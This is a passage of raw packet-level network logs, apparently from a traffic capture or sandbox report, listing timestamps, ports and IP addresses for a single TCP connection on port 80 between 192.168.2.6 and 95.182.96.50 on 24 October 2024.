Oct 24, 2024 13:54:21.196546078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196598053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196614027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196633101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196644068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196666956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196702003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196708918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196737051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196773052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196784019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196810961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196814060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196846962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196881056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196892023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196917057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196949959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196959019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196984053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196990967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197020054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197026014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197055101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197068930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197089911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197097063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197125912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197129011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197160006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197165966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197196007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197205067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197231054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197240114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197268009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197302103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197315931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197336912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197369099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197370052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197377920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197406054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197411060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197444916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.197458982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.197488070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.306582928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.306636095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.306674004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.306690931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.306725025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308705091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.308778048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.308813095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308820009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.308836937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308856010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.308866024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308897972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308917046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.308960915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.308969021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309005022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309025049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309046030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309072018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309123993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309169054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309176922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309214115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309235096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309245110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309261084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309290886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309299946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309335947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309350967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309370995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309381962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309406996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309417009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309461117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309469938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309503078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309514046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309555054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309556961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309592962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309597969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309628010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309633970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309669018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309669971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309704065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309705019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309745073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309765100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309794903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309808016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309835911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309848070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309883118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309889078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309916973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309926033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309953928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.309966087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.309989929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310003996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310044050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310044050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310077906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310085058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310112953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310120106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310148001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310184956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310193062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310221910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310241938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310264111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310297966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310306072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310333014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310340881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310369968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310403109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310415983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310434103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310467958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310481071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310503006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310535908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310542107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310570955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310583115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310606956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310614109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310642958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310672998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310677052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310692072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310713053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310746908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310762882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310781002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310816050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310823917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310854912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310883999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310904980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310916901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310923100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310951948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.310957909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.310986996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.311002970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.311023951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.311033964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.311065912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.366039991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.371737003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.594990969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595115900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595118999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595161915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595168114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595202923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595213890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595238924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595244884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595279932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595298052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595371008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595405102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595417976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595438957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595448971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595474958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595484018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595524073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595534086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595592976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595626116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595638990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595659018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595671892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595694065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595705032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595735073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595748901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595777988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595793009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595813990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595849037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595860958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595890045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595906973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595949888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.595958948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.595993042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596002102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596028090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596039057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596067905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596077919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596112967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596121073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596147060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596153021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596180916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596193075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596215963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596223116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596257925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596270084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596301079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596309900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596333027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596343040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596374035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596386909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596421003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596441984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596455097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596456051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596498013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596517086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596566916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596606016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596612930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596642971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596652031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596678972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596683979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596719980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596736908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596765995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596785069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596805096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596817970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596852064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596898079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596901894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596937895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.596980095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.596987963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597022057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597052097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597057104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597071886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597086906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597091913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597121954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597130060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597155094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597193003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597208023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597240925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597259998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597275019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597280979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597311020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597345114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597357035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597379923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597412109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597423077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597453117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597485065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597491980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597517967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597527027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597563028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597573996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597596884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597603083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597631931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597640038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597668886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597683907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597724915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597735882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597767115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597806931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597819090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597852945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597858906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597906113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597949982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.597955942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.597991943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598025084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598033905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598061085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598063946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598114014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598150015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598160028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598184109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598200083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598221064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598268986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598268986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598304033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598335981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598337889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598341942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598370075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598378897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598422050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598457098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598472118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598491907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598526001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598526001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598540068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598562002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598562956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598596096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598608017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598627090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598642111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598661900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598670006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598697901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598727942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598731041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598747015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598767996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598800898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598812103 CEST	49714	80	192.168.2.6	95.182.96.50
